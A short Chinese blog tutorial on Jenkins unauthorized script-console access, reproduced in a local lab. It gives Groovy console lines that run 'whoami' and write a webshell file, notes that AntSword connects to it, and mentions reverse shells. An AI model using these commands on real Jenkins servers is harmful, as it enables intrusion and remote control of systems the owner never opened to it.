栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

中间件安全-jenkins未授权访问

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

中间件安全-jenkins未授权访问

0x01 前言

跟着百度一步步做,也算是认识了


0x02 jenkins是什么?

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。


ps:不搞java开发,了解即可。

0x03 漏洞概述

未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。
默认端口为8080

0x04 漏洞复现

安装jenkins
链接:https://pan.baidu.com/s/1PzUlSp7Cw82x6zVsvpI6FA
提取码:9528


下载成功,运行后任务管理器开启jenkins服务。

然后再浏览器输入http://localhost:8080

找到脚本命令行,输入

println "whoami".execute().text


上传webshell

new File("D:\phpstudy_pro\WWW\ma.php").write('');

蚁剑连接,成功

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/716811.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号